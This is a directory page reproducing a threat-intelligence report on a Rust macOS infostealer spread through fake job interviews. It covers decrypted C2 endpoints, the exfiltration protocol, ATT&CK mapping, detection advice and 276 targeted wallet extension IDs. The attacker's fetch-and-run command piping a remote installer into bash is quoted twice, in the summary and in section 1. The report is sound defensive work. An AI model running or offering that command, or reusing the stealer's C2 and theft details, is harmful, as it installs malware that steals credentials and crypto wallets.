Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
hyperhives-macos-infostealer-analysis — HyperHivesのmacOS Rust情報窃取マルウェアの完全静的解析 — 571件の復号化された設定値、C2インフラストラクチャ、DPRK/Contagious Interviewの帰属、YARA/Sigmaルール、STIX 2.1バンドル、ATT&CK Navigatorレイヤー | Kitploit
ツール/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
侵害指標 (IOC) 管理OSINT (オープンソースインテリジェンス)リバースエンジニアリングフォレンジックマルウェア分析脅威インテリジェンス論文と研究学習と教育厳選リソース

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

HyperHivesのmacOS Rust情報窃取マルウェアの完全静的解析 — 571件の復号化された設定値、C2インフラストラクチャ、DPRK/Contagious Interviewの帰属、YARA/Sigmaルール、STIX 2.1バンドル、ATT&CK Navigatorレイヤー

リポジトリを見るウェブサイト
31435ヶ月前Kitploit レビュー済み

HyperHives macOS インフォスティーラー — 完全な技術分析

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

脅威インテリジェンス: Rust製のmacOSユニバーサルバイナリのインフォスティーラーで、Wellfound(旧AngelList)上の偽の求人面接パイプラインを通じて配布されました。オペレーターのペルソナ「HyperHive」の「Felix」が、ターゲットにmacos.hyperhives.netからの悪意のあるインストーラーを実行するよう誘導しました。このリポジトリは完全な静的解析を文書化しており、571個の暗号化された設定値(C2 URL、Sentry DSN、**276個の標的とされたChrome拡張機能IDを含む)が復元されています。

サンプルSHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2ドメインcloudproxy.link
配布ドメインmacos.hyperhives.net
誘引プラットフォームWellfound(旧AngelList)
オペレーターペルソナ「HyperHive」の「Felix」
VirusTotal9 / 63 検出
分類公開開示 / IOCバンドル
最終更新2026年4月

目次

  • 脅威インテリジェンスバンドル
  • リポジトリの構成
  • クイックスタート
  • 要約
  • 1 — 発端
  • 2 — バイナリ
  • 3 — 窃取するもの
  • 4 — 復号されたC2インフラ
  • 5 — 属性評価
  • 6 — 暗号解析
  • 7 — MITRE ATT&CKマッピング
  • 8 — ウォレットと拡張機能IDリファレンス
  • 9 — 推奨される対応
  • 10 — 手法
  • 付録A — すべての276個のChrome拡張機能ID
  • 範囲と制限
  • リリース履歴
  • 貢献
  • ライセンス

脅威インテリジェンスバンドル


リポジトリの構成```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

root@kitploit:~
---

## クイックスタート

サンプルを `sample/installer_binary` として配置します(ハッシュ検証については[`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)を参照)、その後:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

composeファイルは network_mode: none, read_only: true を強制し、すべてのLinuxケーパビリティを削除します。完全な取り扱いガイドラインについては SECURITY.md を参照してください。


TL;DR

Wellfound(旧AngelList)の求人投稿が、オペレーターのペルソナ "Felix"("HyperHive")による複数メールのソーシャルエンジニアリング連鎖を引き起こしました。ターゲットの技術的背景を褒め称え、偽の面接を設定した後、攻撃者は被害者に hyperhives.net の「製品を確認する」ように指示し、特に Settings → Diagnostics → Log を調べるよう指示しました。これは次の実行を引き起こすための口実です:``` curl -s https://macos.hyperhives.net/install | nohup bash &

root@kitploit:~
ペイロードは、Rustでコンパイルされた**8.5 MBのMach-Oユニバーサルバイナリ**(x86_64 + arm64)です。エアギャップされたDockerラボと**570個のユニークなx86_64ヘルパールーチン**のCPUエミュレーションによる静的解析により、**すべての571個の暗号化された設定値**が復元され、以下が明らかになりました:

- **C2:** `cloudproxy.link` — 4つのHTTPSエンドポイント
- **Sentry(属性のピボット):** `ingest.de.sentry.io`上の組織/プロジェクトIDを含む完全なDSN
- **ビルドの識別:** Cargoユーザー `rootr`、コードネーム `force`、バージョン `9.12.1`
- **ターゲット:** 276個のChrome拡張機能ID(暗号通貨ウォレット、パスワードマネージャー、企業認証情報)

戦術は**DPRK関連のContagious Interview**キャンペーンと一致しています — 正当なプラットフォームでの偽の求人、多段階の信頼構築、`curl | bash`による配信、Rust macOSスティーラー、暗号資産に焦点を当てた流出。

---

## 1 — 始まりの経緯

### 誘餌: Wellfoundでの偽の面接

攻撃は、**Wellfound**(旧AngelList)での**正当に見える求人情報**から始まりました。標的が応募した後、ペルソナ**「Felix」**と会社名**「HyperHive」**を使用するオペレーターからの以下のメールのやり取りが続きました:

**Email 1**(2026年4月4日) — 最初の連絡。「Felix」は標的の履歴書とLinkedInを確認し、自分たちの「Tech Lead」が先に進めることを承認したと述べ、標的の実際の技術経験に具体的に言及しました。メールでは、HyperHiveが「さまざまなオペレーティングシステム向けにHyperhivesのデスクトップ版を構築している」と述べ、UTC+0での面接の日程調整を招待しました。

**Email 2**(2026年4月5日) — フォローアップの日程調整。特定の面接枠(4月8日15:00 UTC)を提案し、重要なペイロード配信の指示が含まれていました:

> *"可能であれば、**設定 → 診断 → ログ**にある製品ログも簡単にご確認ください。ログやその他気づいた製品の観察事項について簡単なコメントを求めさせていただく場合があります。これは、エンジニアリングの経験と細部への注意力を測る良い指標となることが多いためです。"*

これにより、標的は`https://hyperhives.net`に誘導され、診断セクションに移動すると以下がトリガーされました:```
curl -s https://macos.hyperhives.net/install | nohup bash &

その後に起こったこと

コマンドは8.5 MBのMach-Oユニバーサルバイナリをダウンロードして実行しました。AppleScriptを介して偽のmacOSパスワードダイアログが表示されました。パスワードは入力されませんでした。 プロセスは直ちに終了され、サンプルは分析のために保存されました。

ソーシャルエンジニアリングの手口概要


2 — バイナリ

このサンプルはプロダクションレベルの設計を示しています。セマンティックバージョニング、運用信頼性のためのSentry統合、および570個のユニークなヘルパー関数で暗号化された大規模な組み込み設定を含んでいます。

VirusTotal カバレッジ

フルレポート — 初回提出時(2026年4月)に63エンジン中9エンジン検出。85%以上のエンジンがこのサンプルを検出できませんでした。

特筆すべきベンダーファミリー名(クロスリファレンス用): HashBreaker (Kaspersky), JobStealer (DrWeb), PSW.Agent.BX (ESET), Stealer-BU (Avast/AVG)。

未検出: BitDefender, CrowdStrike Falcon, Sophos, Symantec, McAfee, Malwarebytes, TrendMicro, Fortinet, ClamAV, Panda、およびその他44エンジン。この低い検出率は、このキャンペーンで使用されたRust + カスタム難読化アプローチの運用効果を浮き彫りにしています。

検出率はベンダーがシグネチャを更新するにつれて変化します。最新の結果については、VirusTotalレポートを確認してください。


3 — 窃取するもの

ブラウザデータ (Chromiumベース)

窃取されるデータタイプ: パスワード、クレジットカード、クッキー、セッショントークン、自動入力情報、閲覧履歴。

macOS システムデータ

  • ログインキーチェーン (login.keychain-db) — 偽のダイアログで収集したユーザーパスワードが必要
  • Apple Notes — AppleScript/osascript で窃取
  • ハードウェア識別子 — IOPlatformExpertDevice / IOPlatformUUID、C2に hardwares として報告

メッセージング

  • Telegram Desktop — 完全なアカウント乗っ取りのための tdata セッション資料

暗号ウォレット (188の論理ターゲット、276の拡張機能ID)

ブラウザ拡張機能ウォレット(MetaMask、Phantom、Trust Wallet、Ronin、Exodus、OKX、Bybit、Bitget、SubWallet、Ledger Live、Trezor Suiteなど)の包括的なターゲティング。完全なマッピングはセクション8および output/full_decrypted_config.json を参照。

パスワードマネージャ

回避と運用制御

機能詳細
VM検出C2 JSON内の is_vm フラグ
強制モード リモートオーバーライドフラグ

データ流出

データは ~/Documents/temp_data/Application/ にステージングされ、ZIPに圧縮され、HTTPS経由で multipart/form-data としてアップロードされます。被害者のIPと地理位置情報は https://freeipapi.com/api/json で解決されます。


4 — 復号化されたC2インフラストラクチャ

コマンド&コントロール

エンドポイント役割
https://cloudproxy.link/m/openedビーコン / アクティベーション
https://cloudproxy.link/m/metricsテレメトリ

Sentry DSN (オペレーターフィンガープリント)```

https://526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008

root@kitploit:~
| コンポーネント | 値 |
|-----------|-------|
| **公開鍵** | `526eff9f8bb7aafd7117ca5e33a6a183` |
| **Organization ID** | `4509139651198976` |
| **Project ID** | `4509422649213008` |
| **リージョン** | EU — `ingest.de.sentry.io` |

Sentryに対する合法的なプロセスにより、この組織/プロジェクトに関連付けられたアカウント登録情報、請求記録、アクセスメタデータが取得される可能性があります。

### ジオロケーションAPI

`https://freeipapi.com/api/json` — C2 JSON用の被害者IP/国情報 (`ipAddress`, `countryCode`)。

### C2流出プロトコル

| フィールド | 役割 |
|-------|------|
| `buildName` / `buildVersion` | `force` / `9.12.1` |
| `uid`, `log_id` | 被害者 / セッション識別子 |
| `ip`, `geo` | ジオロケーションAPIから |
| `pers_password` | 偽ダイアログのパスワード |
| `passwords`, `wallets`, `credits`, `autofills` | 盗難データ |
| `is_vm`, `hardwares`, `force_mode` | 環境 / 制御フラグ |

アップロード方式: `multipart/form-data`, `application/zip`, 接続文字列 `UPLD connect`。

---

## 5 — 属性特定

### 侵害指標 (IoC)

| 指標 | 値 | ソース |
|-----------|-------|--------|
| 誘引プラットフォーム | Wellfound (AngelList) | 被害者の報告 |
| 攻撃者ペルソナ | "Felix" (所属"HyperHive") | 誘引メール |
| 誘引用ウェブサイト | `hyperhives.net` | 誘引メール |
| 送信者メール | `[email protected]` | 誘引メール |
| 配信ドメイン | `macos.hyperhives.net` | ペイロードダウンロード |
| 配信IP | `81.28.12.12` (Gcore CDN) | DNS解決 |
| レジストラ / メール | Tucows; Spacemail | WHOIS / MX |
| **C2ドメイン** | **`cloudproxy.link`** | **サンプルから復号** |
| **Sentry DSN** | [第4節](#sentry-dsn-operator-fingerprint)を参照 | **サンプルから復号** |
| ビルドユーザー | `rootr` | 埋め込まれたCargoパス |
| サンプルSHA-256 | `5c7385c3...bf8dd3` | ファイルハッシュ |

### 開発者ハンドル: `rootr`

埋め込みパス `/Users/rootr/.cargo/registry/`。ハンドルに関するOSINT — [github.com/rootr](https://github.com/rootr) (分析日現在): 登録企業 "RootR"、所在地ジュネーブ、アカウント作成 **2024-06-27**、公開リポジトリなし。使い捨てまたは運用用プロファイルと一致。

### DPRK / Contagious Interview (分析評価)

| TTP | 本サンプル | 報告されているDPRK関連パターン |
|-----|-------------|--------------------------------|
| **正規プラットフォームでの偽の求人勧誘** | Wellfound (AngelList) 投稿 → "Felix"とのメール連絡 | Contagious Interview: LinkedIn, Indeed, Wellfoundでの偽採用者による勧誘 |
| **多段階のソーシャルエンジニアリング** | 実際の履歴書に言及した2通以上のメール、偽の面接日程調整 | 信頼構築後ペイロード配信; 複数のDPRKキャンペーンで文書化 |
| **製品レビュー/コードテストの口実** | "設定 → 診断 → ログを確認" | "プロジェクトをレビューしてほしい" / "このコードテストを実行してほしい" といった口実 |
| `curl \| bash` による配信 | `macos.hyperhives.net` からのインストールワンライナー | 一般的なmacOSソーシャルエンジニアリングベクター |
| Rust Mach-O ユニバーサルバイナリ | rustc 1.87.0, x86_64 + arm64 | RustDoor / RustBucket / 類似クラスター |
| 偽のパスワードダイアログ | AppleScript `osascript` | 関連するmacOSキャンペーンで文書化 |
| 多数の暗号通貨ウォレットターゲット | 276個の拡張機能ID, 188個のウォレット名 | DPRKの収益生成と一致する金銭的動機 |

**確信度:** テーマ及びTTPの一致について**高**。Wellfoundの偽求人パイプライン、複数メールによる信頼チェーン、製品レビューの口実、Rust製macOSスティーラー、暗号ウォレットへの焦点は、Contagious Interviewのプレイブックと密接に一致する。これは分析評価であり、政府機関や法執行機関による属性特定声明ではない。

---

## 6 — 暗号解析

設定文字列は**カスタムXOR暗号**によって保護されている: 570個の小さなx86_64ヘルパー関数 (コード範囲 `0x10000`–`0x15000`) がそれぞれ `(data_ptr, seed)` からユニークな16ビットオフセットを計算する。このオフセットはバイナリ内をインデックスして32バイトのXOR鍵を生成し、対応する暗号文ブロックに適用される。

### 失敗したアプローチ

| 手法 | 結果 |
|--------|---------|
| 単純なXOR総当たり | 意味のある平文は得られず |
| AES / PBKDF2鍵推測 | 鍵スケジュールは見つからず |
| UnicornによるRustランタイム全体のエミュレーション | 制御フローの複雑さにより発散 |

### 成功したアプローチ

1. RIP相対 `LEA` 命令で設定領域 (`0x2b8000`–`0x2bc000`) を狙うものを**スキャン**する。
2. 先行コードを**パース**し、`(helper_function_address, data_pointer, seed)` を抽出する。
3. 各ヘルパーを [Unicorn Engine](https://www.unicorn-engine.org/) で**単独エミュレート**する (最大200命令)。
4. 計算されたオフセットにある鍵を用いて、ターゲットアドレスの32バイトブロックを**XOR復号**する。
5. 複数ブロック文字列 (URL, DSN) および OR+XORメタデータエントリのために**拡張**する。

**カバレッジ:** 381 XORブロック + 190 OR+XORメタデータエントリ = **571個の設定値が1.1秒で復元**。未復号の暗号化エントリはゼロ。

**実装:** [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)

---

## 7 — MITRE ATT&CKマッピング

> [`attack-navigator-layer.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/attack-navigator-layer.json) を [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/) にインポートしてインタラクティブに表示できます。

| 技術 | ID | 本サンプルでの使用例 |
|-----------|----|--------------------|
| フィッシング | T1566 | `[email protected]` からのソーシャルエンジニアリングメール |
| ユーザー実行: 悪意のあるファイル | T1204.002 | 誘引からの `curl \| bash` |
| コマンドおよびスクリプティングインタプリタ: AppleScript | T1059.002 | 偽のパスワードダイアログ、Apple Notesの流出 |
| コマンドおよびスクリプティングインタプリタ: Unixシェル | T1059.004 | パイプされたbashによる初期実行 |
| パスワードストアからの資格情報: キーチェーン | T1555.001 | ログインキーチェーンの抽出 |
| パスワードストアからの資格情報: Webブラウザからの資格情報 | T1555.003 | Chromiumログインデータの復号 |
| WebセッションCookieの窃取 | T1539 | ブラウザCookieおよびトークンの窃取 |
| ローカルシステムからのデータ | T1005 | ウォレット、Telegram、Notes、自動入力 |
| 収集データのアーカイブ | T1560 | `~/Documents/temp_data/` 下でのZIPステージング |
| C2チャネルを介した流出 | T1041 | `cloudproxy.link` へのHTTPS POST |
| アプリケーション層プロトコル: Webプロトコル | T1071.001 | 4つのエンドポイントを持つHTTPS C2 |
| 仮想化/サンドボックス回避 | T1497 | `is_vm` フラグ |
| 難読化されたファイルまたは情報 | T1027 | 570個のXORヘルパー関数 |
| 入力キャプチャ | T1056 | 偽のパスワードダイアログ |
| システム情報の探索 | T1082 | ハードウェアIDとOSバージョンの収集 |
| システムネットワーク構成の探索 | T1016 | `freeipapi.com` ジオロケーション |
| 信頼制御の無効化: Gatekeeperバイパス | T1553.001 | ダウンロードしたバイナリに対する `xattr -c` |

---

## 8 — ウォレットおよび拡張機能IDリファレンス

188個のウォレット名と**276個の**ユニークな32文字のChrome拡張機能IDが復元された。以下の表は注目すべきターゲットを示す。完全なリストは [付録A](#appendix-a--all-276-chrome-extension-ids) および `output/full_decrypted_config.json` にある。

| ウォレット | 拡張機能ID |
|--------|--------------|
| MetaMask | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
| Phantom | `bfnaelmomeimhlpmgjnjophhpkkoljpa` |
| Trust Wallet | `egjidjbpglichdcondbcbdnbeeppgdph` |
| Ronin | `fnjhmkhhmkbjkkabndcnnogagogbneec` |
| Exodus Web3 | `aholpfdialjgjfhomihkjbmgjidlcdno` |
| OKX | `mcohilncbfahbmgdjkbpemcciiolgcge` |
| Bybit | `pdliaogehgdbhbnmkklieghmmjkpigpa` |
| Bitget | `jiidiaalihmmhddjgbnbgdfflelocpak` |
| SubWallet | `onhogfjeacnfoofkfgppdlbmlmnplgbn` |
| Coinbase Wallet | `hnfanknocfeofbddgcijnmhnfnkdnaad` |

**デスクトップウォレット:** Ledger Live および Trezor Suite のデータディレクトリも標的にされています。

**重要:** これらの拡張機能IDは、マルウェアがデータ窃取の対象とする**正規のブラウザ拡張機能**を識別します。これらは**悪意のある拡張機能ではありません**。

---

## 9 — 推奨される対策

### 被害を受けた可能性のあるユーザー向け

- 未知の `curl | bash` ワンライナーを**実行しないでください**
- 露出した可能性がある場合、ブラウザに保存されたすべての認証情報、暗号通貨ウォレットキー、パスワードマネージャーのマスターパスワードをローテーションしてください
- ディスクに `~/Documents/temp_data/` が存在しないか確認してください
- 地元の法執行機関および関連国のCERT (例: IC3, NCSC) に報告してください

### 防御者向け

- `macos.hyperhives.net`, `cloudproxy.link`, `81.28.12.12` を**ブロック**してください (IPブロック前に共有ホスティングへの影響を確認)
- `cloudproxy.link` へのHTTPSトラフィックおよび両ドメインへのDNSクエリを**ハント**してください
- このリポジトリのYARAおよびSigmaルールを**展開**してください (環境に合わせてチューニング)
- インストールされているChrome拡張機能を276IDリストと**比較**してください (拡張機能は正規のもので、マルウェアはそのローカルデータを読み取ります)
- `stix/bundle.json` をCTIプラットフォーム (MISP, OpenCTI, ThreatConnect など) に**インポート**してください

### 法的手続きのための情報

| 対象 | リクエストする内容 |
|--------|-----------------|
| Sentry | 組織 `4509139651198976` のアカウントおよび請求記録 |
| ドメインレジストラ | `cloudproxy.link` および `hyperhives.net` のWHOISレコード |
| Gcore CDN | `81.28.12.12` のアクセスログ |
| メールプロバイダ | `[email protected]` のアカウント記録 |
| GitHub | `rootr` のアカウントメタデータ |

---

## 10 — 方法論

分析は**Dockerコンテナ**内で以下の設定で実施:
- `network_mode: none` (外部接続なし)
- `read_only: true` (ルートファイルシステム不変)
- すべてのLinuxケイパビリティをドロップ (`cap_drop: ALL`)
- `no-new-privileges` セキュリティオプション

使用ツール: Python (LIEF, Unicorn Engine, Capstone, r2pipe), Radare2, およびカスタムスクリプト。マルウェアの動的実行は一切行わず、すべての知見は静的解析および個々のヘルパー関数の隔離されたCPUエミュレーションに基づく。

検証済みアーティファクト: [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py), [`output/full_decrypted_config.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/output/full_decrypted_config.json).

---

## 付録A — 全276個のChrome拡張機能ID

マルウェア設定はこれらの拡張機能IDを参照しています (ユーザープロファイル下のlocal-storage / LevelDBパス)。**これらのIDはデータ窃取の対象となる正規の拡張機能を識別するものであり、悪意のある拡張機能ではありません。**```
abkahkcbhngaebpcgfmhkoioedceoigp  abogmiocnneedmmepnohnhlijcjpcifd
acmacodkjbdgmoleebolmdjonilkdbch  aeachknmefphepccionboohckonoeemg
aeblfdkhhhdcdjpifhhbdiojplfjncoa  afbcbjpbpfadlkmhmclhkeeodmamcflc
afccgfbnbpgfdokbllhiccepgggofoco  aflkmfhebedbjioipglgcbcmnbpgliof
agoakfejjabomempkjlepdflaleeobhb  ahkpfejaeoepmfopmbhjgjekibmfcfgo
aholpfdialjgjfhomihkjbmgjidlcdno  aiifbnbfobpmeekipheeijimdpnlpgpp
aijcbedoijmgnlmjeegjaglmepbmpkpi  ajofhbfomojicfifgoeeimefklkfdkfn
ajopcimklncnhjednieoejhkffdolemp  akckefnapafjbpphkefbpkpcamkoaoai
akkmagafhjjjjclaejjomkeccmjhdkpa  algblmhagnobbnmakepomicmfljlbehg
amdcajcnofodjpgbbdnnjkffamfnidae  amkmjjmmflddogmhpjloimipbofnfjih
ammjlinfekkoockogfhdkgcohjlbhmff  anokgmphncpekkhclmingpimjmcooifb
aodkkagnadcbobfpggfnjeongemjbjca  aoedbjimepepemdafoodplnknfkmbnle
apgjfbcibghlclbdiipmojppngeilcol  bbjmepflljbbfaehppakknfgdnojoled
bccippoanbhflmokhkbkepmhmndijenh  bcpialkijhffpgnmgjhjmdeabdbbfmbo
bdgmdoedahdcjmpmifafdhnffjinddgc  bfeplaecgkoeckiidkgkmlllfbaeplgm
bflldjbbpcjgooclhpmhdhioebmnnkcm  bfnaelmomeimhlpmgjnjophhpkkoljpa
bgjogpoidejdemgoochpnkmdjpocgkha  bhhhlbepdkbapadjdnnojkbgioiodbic
bhmbcdekobebkhmloafbjfdcphbmpcnm  bidcmgjdfgkagkleecdockomdjlgglbg
bifidjkcdpgfnlbcjpdkdcnbiooooblg  blnieiiffboillknjnepogjhkgnoapac
bmkakpenjmcpfhhjadflneinmhboecjf  bmmhjnaohafphhlecmkkiaaglcebcapn
bodadjcgfgigmmnambomndppidgdjlni  bplepbelihejfpcjoeialhjpamgpnfln
caalbmclnkldkcgcdkfiapoopikbofnl  cgeeodpfagjceefieflmdfphplkenlfk
cihmoadaighcejopammfbmddcmdekcje  ciojocpkclfflombbcfigcijjcbkmhaf
cjelfplplebdjjenllpjcblmjkfcffne  ckklhkaabbmdjkahiaaplikpdddkenic
cmbagcoinhmacpcgmbiniijboejgiahi  cmoakldedjfnjofgbbfenefcagmedlga
cnmbailpgmdagpofalkeoeooefdkjfdl  cnncmdhjacpkmjmkcafchppbnpnhdmon
cnoepnljjcacmnjnopbhjelpmfokpijm  codfcglpplgmmlokgilfkpcjnmkbfiel
cpmkedoipcpimgecpmgpldfpohjplkpp  dbgnhckhnppddckangcjbkjnlddbjkna
dcbjpgbkjoomeenajdabiicabjljlnfp  dfbacijefbcabjnngipfnbhcpoldlkcg
dkdedlpgdmmkkfjabffeganieamfklkm  dlcobpjiigpikoobohmabehhmhfoodbb
dldjpboieedgcmpkchcjcbijingjcgok  dmjmllblpcbmniokccdoaiahcdajdjof
dngmlblcodfobpdpecaadgfbcggfjfnm  dpcklmdombjcplafheapiblogdlgjjlb
dpdmipjakdiapplcecdmgckknipnfjph  dpealdfjgahljjdekeiadjnfgpijffhg
dpmfhilhjlhhakpbieclcghochdofeao  eaeecbmeajhliilmacefcgjnnijkkfki
ebaeifdbcjklcmoigppnpkcghndhpbbm  ebfidpplhabeedpnhjnobghokpiioolj
efbglgofoippbgcjepnhiblaibcnclgk  egjidjbpglichdcondbcbdnbeeppgdph
ehgjhhccekdedpbkifaojjaefeohnoea  ehjiblpccbknkgimiflboggcffmpphhp
ejbalbakoplchlghecdalmeeeajnimhm  ejbidfepgijlcgahbmbckmnaljagjoll
ejdmhlhkcfbkcoifejkcbonhodkgflgg  ejjladinnckdgjemekebdpeokbikhfci
elalghlhoepcjfaedkcmjolahamlnjcp  eljobehkpcnpekmbcjiidekjhkbcnpkf
ellkdbaphhldpeajbepobaecooaoafpg  emafjfadeeammocialbgjbaeldmpddne
emeeapjkbcbpbpgaagfchmcgglmebnen  emgcpdnckldpdhjgmkeeahfaokmhgpab
enabgbdfcbaehmbigakijjabdpdnimlg  epapihdplajcdnnkdeiahlgigofloibg
fajmdbbmcncahahilpfdiacamedmgdlk  fbplgegfggencanbeceipjpanlmgpkfi
fcckkdbjnoikooededlapcalpionmalo  fcfcfllfndlomdhbehjjcoimbgofdncg
fcjkomdnccnlklmhncgmaehaakjkddnk  fdchdcpieegfofnofhgdombfckhbcokj
fdcnegogpncmfejlfnffnofpngdiejii  fdjamakpfbbddfjaooikfcpapjohcfmg
fhbohimaelbohpjbbldcngcnapndodjp  fhilaheimglignddkjgofkcbgekhenbh
fhmmkjofdcpnoklcbcnbjjhigobceikb  fihkakfobkmkjojpchpfgcmhfjnmnfpi
fijngjgcjhjmmpcmkeiomlglpeiijkld  fjghjobbfggoacelnibacipoilennobn
fldfpgipfncgndfolcbkdeeknbbbnhcc  fmpbldieijjehhalgjblbpgjmijencll
fnabdmcgpkkjjegokfcnfbpneacddpfh  fnjhmkhhmkbjkkabndcnnogagogbneec
fnnegphlobjdpkhecapkijjdkgcjhkib  fopmedgnkfpebgllppeddmmochcookhc
fpibioaihcagphbidhodidjbnclocgll  fpkhgmpbidmiogeglndfbkegfdlnajnf
gbjepgaebckfidagpfeioimheabiohmg  gdokollfhmnbfckbobkdbakhilldkhcj
gejiddohjgogedgjnonbofjigllpkmbf  ghihpcdpbjaaomhlfnhdlocimojkinpm
ghlmndacnhlaekppcllcpcjjjomjkjpg  ghmbeldphafepmbegfdlkpapadhbakde
gjlmehlldlphhljhpnlddaodbjjcchai  gkeelndblnomfmjnophbhfhcjbcnemka
gkhnjcpkikkkfhhdhhphcbhmkikoicgn  gkpbmnplcjdnnmmiaaphofhdiicdhfah
glhefpglgefbmegkpjkdgoikologepdl  hbbgbephgojikajhfbomhlmmollphcad
hbdheoebpgogdkagfojahleegjfkhkpl  hbinmkhlebcnghpikoekkbeljbealbje
hbneiaclpaaglopiogfdhgccebncnjmc  hbnpcbochkgodkmmicbhfpmmkhbfbhim
hddkffjleepiafmkhcneldjipkfkkofk  hdokiejnpimakedhajhdlcegeplioahd
heefohaffomkkkphnlpohglngmbcclhi  hgbeiipamcgbdjhfflifkgehomnmglgk
hgnpaljkalilofmmbhgkkldbdbogddlo  hifafgmccdpekplomjjkcfgodnhcellj
hlbmghfhijdlnllnnnakmcagdfhhkfna  hmeobnfnfcmdkdcmlblgagmfpfboieaf
hnfanknocfeofbddgcijnmhnfnkdnaad  hnhobjmcibchnmglfbldbfabcgaknlkj
hpbgcgmiemanfelegbndmhieiigkackl  hpclkefagolihohboafpheddmmgdffjm
hpglfhgfnhbgpjdenjgmdgoeiappafln  hpjiiechbbhefmpggegmahejiiphbmij
ibjflpbmadchofnbpppegdbnifdgincp  ibljocddagjghmlpgihahamcghfggcjc
ibnejdfjmmkpcnlpebklmnkoeoihofec  icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
idnnbdplmphpflfnlkomgpfbpcgelopg  idpfplgehakelkdadhcacicjjbemjbke
ifckdpamphokdglkkdomedpdegcjhjdp  ifclboecfhkjbpmhgehodcjpciihhmif
ifgjklbmlnimhldbmddmkdhoahfocppf  ikcpjgihikfinlkobegiiogdigohmfam
ilhaljfiglknggcoegeknjghdgampffk  imlcamfeniaidioeflifonfjeeppblda
iokeahhehimjnekafflcihljlcjccdbe  jaooiolkmfcmloonphpiiogkfckgciom
jbdaocneiiinmjbjlgalhcelgbejmnid  jccapkebeeiajkkdemacblkjhhhboiek
jfdlamikmbghhapbgfoogdffldioobgl  jfflgdhkeohhkelibbefdcgjijppkdeb
jhjebgdkdemiibiibgickfkilfpbelaj  jhnilbocebbmeelaolalihfokjgdmogb
jicpmdkafljkkppgpellcjhfhdmjpogm  jiepnaheligkibgcjgjepjfppgbcghmp
jiidiaalihmmhddjgbnbgdfflelocpak  jjkhekbaikcnpnhflnnlnbonkkobkiim
jljjeghmeihjegifdhbghcoihdiegkkl  jmgipjhlmabpmcikcahmmgleghckefjg
jnggcdmajcokeakpdeagdhphmkioabem  jnldfbidonfeldmalbflbmlebbipcnle
jnlgamecbpmbajjfhmmmlhejkemejdma  jojhfeoedkpkglbfimdfabpdfjaoolaf
kdgponmicjmjiejhifbjgembdcaclcib  keenhcnmdmjjhincpilijphpiohdppno
kfdniefadaanbjodldohaedphafoffoh  kgdijkcfiglijhaglibaidbipiejjfdp
khgocmkkpikpnmmkgmdnfckapcdkgfaf  khpkpbbcccdmmclmpigdgddabeilkdpd
kilnpioakcdndlodeeceffgjdpojajlo  kjjebdkfeagdoogagbhepmbimaphnfln
kkpehldckknjffeakihjajcjccmcjflh  kkpllbgjhchghjapjbinnoddmciocphm
kkpllkodjeloidieedojogacfhpaihoh  klghhnkeealcohjjanjjdaeeggmfmlpl
kmphdnilpmdejikjdnlbcnmnabepfgkh  kncchdigobghenbbaddojjnnaogfppfj
kolfcecahpbgbilkdkalabnfjjklkkae  kpfopkelmapcoipemfendmdcghnegimn
kppfdiipphfccemcignhifpjkapfbihd  kppgpfphbmbcgeglphjnhnhibonmebkn
lccbohhgfkdikahanoclbdmaolidjdfl  ldcihfaojdpmhjkhioilfjjckehehddg
lfmmjkfllhmfmkcobchabopkcefjkoip  lgmpcpglpngdoalbgeoldeajfclnhafa
lkpmkhpnhknhmibgnmmhdhgdilepfghe  llakdhpogpnejheknjbhbadoaomejgbi
lmkncnlpeipongihbffpljgehamdebgi  lnnnmfcpbkafcpgdilckhmhbkkbpkmid
